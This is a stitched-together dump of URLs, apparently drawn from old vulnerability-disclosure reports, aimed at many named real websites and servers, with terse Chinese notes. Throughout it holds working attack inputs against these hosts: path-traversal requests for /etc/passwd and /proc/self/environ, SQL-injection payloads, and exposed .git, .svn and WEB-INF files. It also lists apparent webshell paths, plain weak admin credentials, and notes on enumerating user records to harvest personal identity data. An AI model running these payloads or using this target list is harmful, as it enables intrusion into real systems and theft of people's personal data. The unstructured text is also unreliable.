http://www.thfund.com.cn/zlbpro/zlbPage/index_page_3.action;JSESSIONID1=TvqZJ2lJRF7pGvjFSMfTnJ2QWdj5v4vc8d6MCt48cgy4pg3jRGQn!1971221988?actionName=thottopicsAction_list http://blog.39.net/askU36CA/pic_462786.html http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://s1.ygimg.cn/template/common/js/jquery-1.4.2.min.js?3.1.0 http://s2.ygimg.cn/template/common/css/base-2.css?3.1.0 http://s2.ygimg.cn/js/common/validate/css/validator.css?3.1.0 http://s1.ygimg.cn/template/common/css/new_log_reg.css?3.1.0 http://s2.ygimg.cn/template/common/js/yg.common.js?3.1.0 http://s1.ygimg.cn/template/common/js/yg.member.js?3.1.0 http://s1.ygimg.cn/js/yitianmall/usercenter/findpwd.js?3.1.0 http://www.yougou.com/#ref=all&po=logo_yougou http://www.yougou.com/topics/mobile.html http://itunes.apple.com/cn/app/zhang-shang-you-gou/id504493912?mt=8 http://mobile.yougou.com/appVersion/package.sc?channelCode=YgYougouwebA59 border-right:none https://vpn.sasac.gov.cn/ http://hybrid.baidu.com/.git/config http://www.17ugo.com/ https://raw.githubusercontent.com/THOK-SW/wms_rfid/master/doc/%E5%B9%BF%E8%A5%BF%E5%90%84%E5%9C%B0%E5%B8%82%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%20.doc http://111.44.243.31/qhlp/js/safeCenter/selectEmail.action?account=123 http://loginserver.ourgame.com/login/login.rar http://www.niuhuhu.com/hotel/price?checkin=2015-5-13&checkout=2015-5-14&hotelid=* http://www.niuhuhu.com/hotel/price?checkin=2015-5-13&checkout=2015-5-14&hotelid=1 www.wenanji.com会跳转到流米主站http://www.iliumi.com/ http://www.tzgh.gov.cn/dynamic/WebInformation/message_list.php?CategoryID=1 http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://www.ncstdc.org/www.rar www.17ugo.com http://www.17ugo.com http://www.hexindai.com/log.txt http://www.cwan.com/include/w.php www.cwan.com/plus/diy.php www.cwan.com/plus/count.php http://www.massjj.gov.cn/searchnews.aspx?s=1 http://circle.51yund.com/ http://mail.qufenqi.com/ ftp://58.213.46.198/ http://ilife.homelink.com.cn/aigou/?c=index&a=orderbuy&id=106714 http://113.108.91.188/zabbix/ http://113.108.91.188/cacti/ http://113.108.91.188/nagios/ www.kuparts.com)是国内首家集汽车配件、汽车用品、汽车服务于一体的电子商务平台,以B2B2C+O2O的商业模式开创了汽车后市场全新的电商格局,致力于成为中国汽车后市场全产业链在线交易服务第一平台。 http://113.108.91.188/zabbix/ http://www.ztesoft.com:808/ www.ztesoft.com:808 ftp://58.213.115.119/ http://www.shenzhenpost.com.cn:81/jsp/login.jsp ftp://58.213.46.194/ http://mall.51yund.com/exchange/orderAddress?order_id=1&product_id=5&circle_id=&user_id=10000 http://mall.51yund.com/exchange/orderAddress?order_id=1&product_id=5&circle_iduser_id=1244685 http://edu.csdn.net/combo?t=GPU%E6%B8%B2%E6%9F%93 http://dspcdc.ee.stust.edu.tw http://cms.csdb.cn/cms4jadmin/login.jsp http://feedback.hao.360.cn/ http://down.chinaz.com/soft/24224.htm http://admin.fadongxi.com/ http://brandbase.mama.cn/yikexin.php?ctype=*&mod=growth&op=detail&pgcount=12&tid=1520677 URL:http://www.mama.cn:80/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=*&num=25&page=1&searchtype=photo http://client.weimai.com/weimai/s/user/getshopinfo.json?id=1&callback=json http://222.92.49.180:8080/UserLogin.aspx http://service.faw-mazda.com/Spareparts/index.php/beipinzixun/broadscast?id=758 http://wss.csair.com/WEB-INF/classes/hibernate.cfg.xml jdbc:oracle:thin:@10.103.118.61:1521:ECS http://car2share.daihing.com/ http://car2share.daihing.com/daimler-main/help/forgetPwd.shtml http:/car2share.daihing.com/daimler-main/help/forgetPwd3.shtml http://blog.99.com/admin.php,管理后台存在弱口令admin/admin http://w.k189.cn/Log/ http://ehr.qfkd.com.cn:8080/template/search_template?module=-1&type=10*&res_flag=31 http://ehr.qfkd.com.cn:8080//template/searc http://ehr.qfkd.com.cn:8080//template/searc http://221.226.82.226:8088/njqxjweb/homepages/comp_query_page.aspx http://www.cofcoyoucai.com/user/userInfo.html http://www.j1.com/ http://www.hx.gov.cn/wap/ljhx/list.php?pid=387 http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.pgzhibo.com/list.php?pid=6 http://www.hx.gov.cn/wap/ljhx/list.php?pid=387 http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.pgzhibo.com/list.php?pid=6 http://scication.swu.edu.cn/list.php?pid=197 http://www.xinganx.com/list.php?pid=4 http://www.fiberglasschina.com/list.php?pid=4 http://www.99jiaocheng.com/list.php?pid=31&info=pre_hcinfo http://www.wjxrd.gov.cn/ztbd/list.php?pid=2228&ty=223 http://www.fengfan.com.cn/wap/list.php?pid=211&id=409 http://www.sinorda.com/List.php?pid=0&cid=15&id=30 http://bmcb.shsmu.edu.cn/shsmu/List.php?pid=0&cid=3 http://wsxf.shouxian.gov.cn/email_pub.asp?DepartNo=001000000 http://wsxf.shouxian.gov.cn/view_mail.asp?xfsxbh=201400000096&DepartNo=001000000 http://wsxf.shouxian.gov.cn/view_mail.asp?xfsxbh=201400000096&DepartNo=001000000 http://xf.suifenhe.gov.cn/view_mail.asp?xfsxbh=201400000074&DepartNo=001000000 http://www.ybqxf.gov.cn/view_mail.asp?xfsxbh=201400000015&DepartNo=001000000 http://221.206.154.214/view_mail.asp?xfsxbh=201100000397&DepartNo=001000000 http://wsxf.shouxian.gov.cn/email_pub.asp?DepartNo=001000000 http://wsxf.shouxian.gov.cn/email_index.asp?DepartNo=001000000 http://221.237.222.20/introduction.asp?DepartNo=001000000000 http://www.ybqxf.gov.cn/email_pub.asp?DepartNo=001000000 http://xf.suifenhe.gov.cn/email_pub.asp?Page=3&DepartNo=001000000 https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.thfdc.gov.cn/Web_Site/jzxx.aspx?lmid=200 http://www.thfdc.gov.cn/Web_Site/zxdy.aspx?lmid=203 http://www.xgfdc.com.cn/Web_Site/jzxx.aspx?lmid=200 http://www.xgfdc.com.cn/Web_Site/zxdy.aspx?lmid=203 http://www.hsxfdc.com/Web_Site/jzxx.aspx?lmid=200 http://www.hsxfdc.com/Web_Site/zxdy.aspx?lmid=203 http://www.ljfc.gov.cn/Web_Site/jzxx.aspx?lmid=200 http://www.ljfc.gov.cn/Web_Site/zxdy.aspx?lmid=203 http://www.yxfgs.net/Web_Site/jzxx.aspx?lmid=200 http://www.yxfgs.net/Web_Site/zxdy.aspx?lmid=203 http://www.hhsfcglj.com/Web_Site/jzxx.aspx?lmid=200 http://www.hhsfcglj.com/Web_Site/zxdy.aspx?lmid=203 http://www.gd-linux.org/ajax.do?act=getinfo&oper=ProductAction http://m.mogujie.com/x4 http://mbcf.dfci.harvard.edu/phpMyAdmin http://219.143.15.9/login.jsp http://192.168.6.1:8000/index.htm http://192.168.8.1/login.html# http://chandra.harvard.edu/blog/files/images/20150329173150-90127.php http://hanyu.iciba.com/wiki/采用HDWiki,而这套系统存在注入。 hanyu.iciba.com/wiki/index.php?edition-compare-1 http://61.178.81.162:8888/LQL_OA/login.aspx http://car2sharew.daihing.com https://github.com/tecshuttle/fishbone/blob/master/application/config/development/config.php http://zdcg.517na.com/ http://th.517na.com/ http://gj.517na.com/ http://car2sharew.daihing.com/admin http://218.244.141.71/authorize/Login.jsp http://yjsyx.zstu.edu.cn/yxxt/web/zzfw_index.do存在 http://my.anjuke.com/login http://my.anjuke.com/usercenter/login https://cas.hbmy.edu.cn/securitycenter/pass!find.action?mode=mibao https://www.hongkongair.net/recruitment/recPositionShowAction!searchRecShowPosition.action?_t_=1324602803257 http://jiudian.suning.com/hotelpay-web/myHotelOrder/showHotelOrderDetail.htm?hotelOrderId=15xxx http://wooyun.org/bugs/wooyun-2015-0114420/trace/21bc63751b03b6f24d0682f5f73986ba http://www.jobhb.com/person/personinfo_modi.asp?action=1&rid=3496修改这个连接后面的数字可以遍历所有用户资料包括身份证,邮箱,姓名,出生日期,电话,通讯地址。 http://ltx.cncnc.edu.cn http://58.248.56.70 http://my.xcar.com.cn/set/mobile.php?h=4 http://oa.yaochufa.com/ http://lb.pptv.com/user/login这个接口,没有登录的限制,然后直接可以抓包之后开始设置变量撞库 http://next.36kr.com:9200/ http://dfi.bnuz.edu.cn/graduate.php?newsid=9 http://dfi.bnuz.edu.cn/news.php?newsid=1384 http://dfi.bnuz.edu.cn/news.php?newsid=1397 https://github.com/cheerzhang/pythontest/blob/12fe66150986b9fdfd47ac47f1975fff743cfa2a/sendmail.py http://cacti.bokecc.com//cache/2.php http://h5.cmge.com/downloadCount!service?foldName=12209_zhensanguokuaida&name=../../../../../../../../../../etc/passwd&objId=12209 http://www.lashou.com/account/ResetReq/step1/ http://dm.10086.cn/w/p.zip http://dm.10086.cn/auth/login?needLogin=false&display=html&service=http%3A%2F%2Fwww.baidu.com%2F%3F1431731253.37 http://dm.10086.cn/w/lv?f=2653&vt=4&pg=524&tgu=http%3A%2F%2Fwww.baidu.com%2F%3F1431731996.83 http://123.172.126.20:8080/ http://202.70.26.137:8080/ http://222.161.211.132:8080/ http://203.86.10.137:8080/ http://119.255.19.71:8080/ http://202.70.26.137:8080 http://gc.51.com http://s3.xrxsg.51.com https://member.feiniu.com/getaway/login http://rjt.czlib.net:8010/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.112.200.137/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.195.60.180/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://sy2.hbdlib.cn/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://120.196.134.134/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://218.195.112.46/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.118.72.9/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://202.121.241.131/softwarer/include/download.asp?CODE=olk_xp_ch_bj_0006 http://www.ay110.com.cn/admin/ http://www.nbhrss.gov.cn/ http://shbxwsb.nbhrss.gov.cn:8080/sionline/commpages/comm/orisource.jsp?opseno=246412120# http://ecases.medlive.cn/list-zhuanqu-132.html?issearch=1&searchkey=title&searchcontent=11 http://app.jshrss.gov.cn/,这里可以下载到江苏人社的移动端的App。 http://app.jshrss.gov.cn:81/testjk/jsrs/complainlist.jsp?user_id=0000117304&id=&submit_data=&page_size=100&start_page=1&tsjblx=3,修改user_id参数,可以获取其投诉的流水号。截图如下: http://app.jshrss.gov.cn:81/testjk/jsrs/complaindetail.jsp?id=32000015051567798,可以发现举报的具体内容,截图如下: http://job.zte.com.cn/ http://job.zte.com.cn/SocietyRecruitFront/PositionManage/PositionDetail.aspx?jobid=Z2015034680 https://ept.bot.com.tw/BOT01Web/showNews.jsp?posterId=20511 http://i.wo.cn/wooyun.txt inurl:file_post/display/topic.php?TopicCode=12 http://luhe.gdrtvu.edu.cn/file_post/display/topic.php?TopicCode=12 http://bjcenter.crtvu.cn/file_post/display/topic.php?TopicCode=12&CourseID=0 http://www.wdtvu.com/file_post/display/topic.php?TopicCode=12 http://www.gzrtvu.com/file_post/display/topic.php?TopicCode=12 http://ddzx.bbtvu.ah.cn/file_post/display/topic.php?TopicCode=12 http://hsdd.hstvu.com.cn/file_post/display/topic.php?TopicCode=12 http://www.meitun.com/ http://www.quwan.com/user.php?act=address_list http://**.**.**/riskIndex.jsp_ http://www.pdnotary.com/xianshi.aspx?ID=14&biaoti=%E9%80%9A%E5%91%8A%E5%85%AC%E7%9F%A5&biao=announcement http://h5.kaiyuanhotels.com/m/login/toLogin.htm www.cq.cyberpolice.cn/Manager/login.aspx www.cq.cyberpolice.cn/WebResource.axdd=uetl-P2hU7LIm_ inurl:http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?TRAINEEID= http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?traineeid=201515082A1 http://www.ceaftc.com/Internal/wpapi/trainee_showpage.jsp?TRAINEEID=20106520A1 http://www.wooyun.org/bugs/wooyun-2015-0114613/trace/6b8512373b7ad2c2608ecf89f0a9b4ce http://ecasesp.medlive.cn/ac-usercenter/register.html inurl:http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo=BJ-127185821&depCode=beijing http://manager.xhd.cn/view/orderviewfindbyorderno.action?order.orderNo=BJ2119545089&depCode=beijing http://www.peng-xin.com.cn/dichan/home2-dt.asp?id=4 http://passport.feng.com/index.php?r=pwd/forgetPassword http://auth.seeyouyima.com/login http://auth.seeyouyima.com/login/change_password http://auth.seeyouyima.com/login http://rjt.czlib.net:8010/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://202.112.200.137/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://sy2.hbdlib.cn/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://120.196.134.134/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://218.195.112.46/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://202.118.72.9/Softwarer/ThirdLevel/mediabook.asp?code=my_8.5_ch http://rjt.czlib.net:8010/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.118.72.9/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.121.241.131/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://120.196.134.134/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://202.112.200.137/Softwarer/ThirdLevel/mediasubject.asp?code=cad090714_2008_ch http://www.qy.com.cn/getpwd.html http://220.191.221.74/index!index.action http://www.12308.com http://cms.qingting.fm/ http://115.29.168.119/phpsso_server/uploadfile/avatar/1/1/1/3333/22.php http://183.232.11.212/jeewx/ http://183.232.11.212/jeewx/upload/files/20150517203533dKJuKaM1.jsp http://rmp.haier.net/data/ http://rmp.haier.net/kindeditor/ http://rmp.haier.net/backup/ http://rmp.haier.net/uploads/ http://rmp.haier.net/admin/ http://learning.haier.net/a.jsp http://58.213.145.69:8088/IPSysSIPO/Manager/Login.aspx http://choujiang.haier.net/upload/ http://choujiang.haier.net/images/ https://github.com/weizhongpeng/dqm/blob/699d41be5e39ca901020f1f90f215c0cb70d0ecc/WebContent/WEB-INF/classes/environment.properties http://my.ctrip.com http://pass.enet.com.cn/reset_ps.jsp http://cpm.youku.com/monitor/nilsen_si.jsp site:babytree-inc.com hr.babytree-inc.com/security/home.html hr.babytree-inc.com/security/login.html hr.babytree-inc.com/security/console.html http://home.babytree-inc.com/.git/config http://rtx.babytree-inc.com:8012/ http://rtx.babytree-inc.com:8012/check.php http://rtx.babytree-inc.com:8012/admin.php http://hlpx.qiluhospital.com:8000/login.jsp http://www.wooyun.org/bugs/wooyun-2015-0114613/trace/6b8512373b7ad2c2608ecf89f0a9b4ce http://www.wooyun.org/bugs/wooyun-2015-0114653/trace/c63ecd40a4d08d97335af3b72880a96f http://my.mbaobao.com/member/profile/address http://121.13.248.36/ http://gtresearch.gtfund.com/ http://gtresearch.gtfund.com:8280/myname/test1.jsp http://ir.firstholding.com.tw/c/event_release_o.php?id=4606 http://www.oneniceapp.com/ http://222.76.126.101/ http://www.wanxinsoft.com/ http://202.114.33.72/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://210.43.24.201:8080/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://210.27.176.162/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://210.40.162.138:8000/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://yqgx.zstu.edu.cn/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://dxsb.qfnu.edu.cn/model/TwoGradePage/TrainSignUp1.aspx?tblApparatusRepertoryListID=44807 http://183.136.198.245/credit/plat/forget.action site:wap.koudaitong.com/v2/trade/order http://health.gj.qq.com:8080/jmx-console/ http://sz.js.qq.com/ http://sz.js.qq.com/Admin/Index http://redpocket.vvipone.com/campaign/dianrong/dianRongLogin.html http://redpocket.vvipone.com http://www.renren.com/bind/baidu/rb http://gps4.56pip.com/index.aspx# URL:http://passportstdby.pptv.com/v3/login/login.do GET:format=jsonp&from=undefined&cb=jQuery183044330982165411115_1431927168727&username=******@qq%2ecom&password=******&CheckboxSaveInfo=on&_=1431927177720 http://www.nongyou.com.cn/ http://60.217.72.17:8000/FreeTextBox/Editor/ftb.imagegallery.aspx http://61.133.119.187:8089//FreeTextBox/Editor/ftb.imagegallery.aspx http://222.135.109.70:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://222.135.76.147:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://221.2.171.59:8000//FreeTextBox/Editor/ftb.imagegallery.aspx http://221.2.156.181:8100//FreeTextBox/Editor/ftb.imagegallery.aspx http://youhuiquan.55bbs.com/consume.php?keyword=1 http://202.111.175.199/system/login.php http://202.111.175.199:8888/login.php http://202.111.175.199:8000/ http://idarun.com Usernaem:admin Password:a123456 www.hktv.tv www.cgv.com.cn有完全一样的漏洞!!!! http://www.cgv.com.cn/activity/activity!getHistoryByAjax.dhtml?pageNum=1&_cityId=ALL&_cinemaId=ALL&_month=2015-03&_=1431747638486 http://www.cgv.com.cn/activity/activity!getRewardsByAjaxPage.dhtml?_cityId=489&_cinemaId=50&_pageNum=1&_=1431931980427 http://www.cgv.com.cn/activity/activity!getCouponsByAjaxPage.dhtml?_cityId=489&_cinemaId=50&_pageNum=1&_=1431932071850 http://www.cgv.com.cn/.svn/entries www.cgv.com.cn/WEB-INF/web.xml http://www.zbird.com/auth/login/redirecto/L29yZGVyL2luZGV4/ http://v8.workyi.com/ http://v8.workyi.com/hunter/posts.aspx?key= version:2.5.130916 http://v8.workyi.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.tjkyhr.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://beijing.ahyylw.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.liuzhoujob.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.yiwork.net/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://test.fashiondigital.net/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://1317hr.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://gz.baoxianren.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://t.baoxianren.com/hunter/posts.aspx?key='%20and%20@@version=0%20or%20'%'='% http://www.edu025.net/) inurl:/webSchool/read.aspx?ID= http://hxxx.zajyj.cn/webManage/default.aspx?classID= http://za6z.zajyj.cn/webManage/default.aspx?classID= http://spxx.zajyj.cn/webManage/default.aspx?classID= http://mtxx.zajyj.cn/webManage/default.aspx?classID= http://jzzx.zajyj.cn/webManage/default.aspx?classID= http://zyzx.zajyj.cn/webManage/default.aspx?classID= http://ljzx.zajyj.cn/webManage/default.aspx?classID= http://yanxi.zajyj.cn/webManage/default.aspx?classID= http://rxzx.zajyj.cn/webManage/default.aspx?classID= http://glzx.zajyj.cn/webManage/default.aspx?classID= http://mail.yn.gov.cn/ http://yun.lu http://bjtu.yun.lu/user/sendChgPwdEmail http://tsinghua.yun.lu/user/sendChgPwdEmail http://muc.yun.lu/user/sendChgPwdEmail http://bistu.yun.lu/user/sendChgPwdEmail http://whu.yun.lu/user/sendChgPwdEmail http://124.192.148.18 http://www.hrbcgs.gov.cn/detail.jsp?infoid= http://exam.186nfc.com/inc_upload.php http://www.jb51.net/article/28276.htm http://www.zhulang.com/forget/index.html http://www.zhulang.com/forget/newPwdPhone.html http://www.wodexiangce.cn inurl:TransactList.aspx?ItemName= inurl:onlineApply/ApplyGuide.aspx http://60.215.8.148:6006/onlineApply/ApplyGuide.aspx?infoFlowId=d9156d6a-b0c9-4870-9fae-ae34db6a33ab http://snsp.qingdao.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=100207 http://ptfwzx.gov.cn/outportal/onlineApply/ApplyGuide.aspx?code=351100-10127-XK-001-01&version=1 http://shenpi.dongying.gov.cn/fabu/onlineApply/ApplyGuide.aspx?infoFlowId=af3d0ca1-3feb-43d0-b92d-4197706f3f2d http://www.bzxzspzx.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=a3bc04dd-9554-4c0a-84b7-33d8b21ccf47 http://www.whaac.gov.cn:8080/onlineApply/ApplyGuide.aspx?infoFlowId=82eecb38-a253-4a7f-abf3-67a68a423120 http://www.rcsp.cn/onlineApply/ApplyGuide.aspx?infoFlowId=f156be2e-ee35-4dca-ae5d-170894ddc5b8 http://www.xc.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=02128 http://www.pts.zszwfw.gov.cn/zhoushan/ApplyGuide.aspx?infoflowId=01679 http://www.lgqzwfw.gov.cn/xspww/onlineApply/ApplyGuide.aspx?infoFlowId=d37fa1e0-116d-4773-922b-94c07a122ecc http://www.whctpasc.gov.cn/onlineApply/ApplyGuide.aspx?infoFlowId=eddd6345-c052-4984-88d6-b9b902f8795a http://www.whjqzwfwzx.gov.cn/wsbsdt/onlineApply/ApplyGuide.aspx?infoFlowId=25a42045-5864-4bfe-89b7-e2cdde53cfaf http://218.57.241.219/index.do http://itbangke.suning.com/web/ https://www.95598pay.com/rest/hxentcustomerinfo/findLoginPwd www.hktv.tv www.hktv.tv http://www.merchantstravel.com/tuan_list1.asp?dz=0&ntype=1&months=6&s=3&days=6 http://www.merchantstravel.com/admin/main.asp# www.hktv.tv http://campaign.hncb.com.tw/debt.asp?snop=9802190906 http://www.iliangcang.com/i/usermain/fans/?id=504395684 site:iliangcang.com http://adm.iliangcang.com/ http://drops.wooyun.org/tips/2006 http://m.jiuxian.com/m_v1/user/login http://www.hrbegs.gov.cn/admin/login.php http://hi.haidilao.com/pages/haidl/alter_password_phone.jsp http://www.iliangcang.com/i/usermain/?id=1259 http://www.iliangcang.com/i/usermain/favour/?id= http://www.iliangcang.com/i/usermain/my/?id=504395684 http://www.iliangcang.com/i/usermain/feed/?id=504395684 http://www.iliangcang.com/i/usermain/follow/?id=504395684 http://www.iliangcang.com/i/message/msg_detail/?id=999998832 http://**.**.**/ULogin.aspx http://app.scjst.gov.cn/MCreditSC/personsys/jzsgoon/JZS/PrintPersonList.aspx?classId=2916 http://app.scjst.gov.cn/MCreditSC/personsys/jzsgoon/JZS/PrintPersonList.aspx?classId=2918 www.landandan.com ResumeUploading.aspx/GetEmpIdByKeyWords http://zhibo.yushu.gov.cn:8082/css/meeting/base/Com_OpenBroadcast.do?crmId=266 http://**.**.**/ http://www.ztehn.com/ http://dev.10086.cn/ http://dev.10086.cn/oms/appcombine/PubAppAction.action?method=appProfile&appId=300009009716 http://bbs.m.my089.com/m/detail?mid=13122923-5309-5649-0009-270375689169&fsid=8b6c6f0b-f3d8-11e4-9a9d-ecf4bbd35074 http://bbs.my089.com/topic/list?mid=13122923-5309-5649-0009-270375689169&ise=1 http://partner.life.qq.com/card/list?page=237&totalItems=4893 http://partner.life.qq.com/card/show?cardid=1636669606 http://partner.life.qq.com/menu/view?cardid=1151360746 http://www.hbzfhcxjst.gov.cn/UpFiles/Attach/2013/12/19/1708066163.pdf http://www.smart-city.org.cn/ http://www.wanxinsoft.com/ http://210.43.24.201:8080/model/TwoGradePage/res.aspx?id=44814 http://210.27.176.162/model/TwoGradePage/res.aspx?id=44814 http://202.114.33.72/model/TwoGradePage/res.aspx?id=44814 http://yqgx.zstu.edu.cn/model/TwoGradePage/res.aspx?id=44814 http://dxsb.qfnu.edu.cn/model/TwoGradePage/res.aspx?id=44814 http://180.169.5.231/ http://180.169.5.231/invoker/JMXInvokerServlet http://180.169.5.231/wooyun/woo.jsp http://puser.zjzwfw.gov.cn/sso/usp.do?action=ssoLogin&servicecode=njdh http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=employNewsOpen&id=2 http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=preach&cityid=82 http://61.141.236.33:8080/index.php?c=schoolRecruitment&f=jobPosition&cate=all http://snms.deppon.com:8080/itms/index.login.action http://180.153.16.29:8080/itms/index.login.action acs.ear/itms.war/ http://180.153.16.29:8080/itms/index.login.action acs.ear/itms.war/ http://newadmin.newman.mobi http://58.53.209.98/ http://bi.xinhehui.com/Public/Public/document?handle=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://bi.xinhehui.com/Public/Public/document?handle=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts http://www.rz12333.gov.cn/rz12333/e/tool/bysda/index.php http://new.51cto.com/php/viewart.php?ID=10013.htm http://ly.tdtchina.cn/webchat/login.action如图所示: http://jiance.sdta.com:8080/webunion/webframe/Login.action?request_locale=zh http://221.229.34.152/Login.aspx http://180.153.19.34/omc/login.jsp?error=true http://180.153.19.34/jmx-console/需要认证 http://www.dtspaq.gov.cn http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/jbshouli.aspx?id=1 http://222.135.109.70:8100/jubao/jbshouli.aspx?id=1 http://61.133.119.187:8089/jubao/jbshouli.aspx?id=1 http://60.217.72.17:8000/jubao/jbshouli.aspx?id=1 http://222.135.127.190:7000/jubao/jbshouli.aspx?id=1 http://www.whfdc.gov.cn/newhouse/spf/detail-gs-ld-xx.php?houseno=49571&prjid=-12221 http://www.whfdc.gov.cn/newhouse/spf/detail-gs-ld-xx.php?houseno=49571&prjid=-12221 https://school.chb.com.tw/PaymentForm/PaymentForm.aspx?SCHOOLNO=1023&STUID=998L0020 http://ofund.emega.com.tw/prod/latest_value.asp?fdcid=D i.56.com/u/adminlogin/album/这是一个用户首页,然后再点击右上角的登陆就可以了,然后看到是没有验证码限制的 http://111.4.115.169:8839/secure/login http://rst.aoratec.com:8088/istnew_v4.4/system/doLogin.do http://rst.aoratec.com:8088/istnew_v4.4/system/doLogin.do http://124.133.54.13:81/g2/ http://top.52pk.com/index.php?c=../../../../../../../../../../proc/self/environ%00.txt&color_1=&line=10&m=add&p=xin_ts&title=e&width=260 http://top.52pk.com/index.php?c=../../../../../../../../../../proc/self/loginuid%00.txt&color_1=&line=10&m=add&p=xin_ts&title=e&width=260 http://info.nenu.edu.cn/newsdetail02.php?id=10892等页面存在SQL注入,可拿到passwd、httpd.conf和config.inc.php等文件,能分析出操作系统用户和数据库账户及口令。 http://www.bajiebao.com/sysMsg/getMessage http://www.megaholdings.com.tw/contents/news/show_news.asp?SN=108 http://www.megaamc.com.tw/content/search/search01.asp?CityCode=260 http://taian.21tb.com/ http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/opacOpenurl/getOpenUrlByBookId/1 http://113.247.235.133:8081/opac/opacOpenurl/getOpenUrlByBookId/1 http://211.84.163.240:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://library.cnuschool.org.cn:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://114.242.187.29:8080/opac/opacOpenurl/getOpenUrlByBookId/1 http://i.sqgame.net/VIP/ZFBBuyVip.aspx?id=3 http://qiandan.jiaji.com/SignScan/login.action http://222.171.148.161/UMC/Login.action http://222.75.152.197:8080/UMC/Login.action http://222.47.70.3:8080/UMC/Login.action http://218.28.177.149/UMC/Login.action http://211.138.102.195:8080/UMC/Login.action http://222.171.148.161 http://weixin.family.baidu.com/index.php/site/login http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20 http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx可以查询出员工的详细信息。 http://es.cslc.com.cn/Ajax/Contract/GetContractLXbyLB.asp?ContractLB=1 inurl:contentmanager.do?method=view http://60.247.10.155:8001/cms/login.html http://www.iliangcang.com/i/myorder?act=orderListPay&page_size=10&page=0&keyword=1 http://**.**.**/ http://218.76.25.212:9010/OrderAir/Details/76853?ref=%2FOrderAir%2FAudit%2F http://211.137.36.122/ http://119.167.225.28:81/shengbang/list.php?type=A https://www.baidu.com/s?wd=intitle%3A%E8%AE%A2%E5%8D%95%E8%AF%A6%E6%83%85&pn=20&oq=intitle%3A%E8%AE%A2%E5%8D%95%E8%AF%A6%E6%83%85&ie=utf-8&usm=1&rsv_idx=1&rsv_pq=972152cc00026cdc&rsv_t=07eajB6TlNb1FYCSrLQX3Z%2FOKjRctLem7dG3DrS7uDfco6FVUoHp0X%2BEeFU http://order.ny.cn/storeOrderDetail.htm?orderNo=15030801994800 http://www.laiyihuo.com/PersonCenter/HistoryDetail/03433ee6-0336-415d-8323-237a0af9e5a3 http://hi.189.cn/shop/orderSearch/orderDetail.shtml?orderCondition.webOrder=645F0D43B5DC4B62736FBADB978C2B48556477A7A235299A&channelCode=10&actionType=GR_ZX http://map.baidu.com/detail?qt=movie&act=detailpc&id=14102144&sign=a8aa9921ae7d10f33dc6698df744d653609d3b96&tab=1&from=pc&is_c_order=0 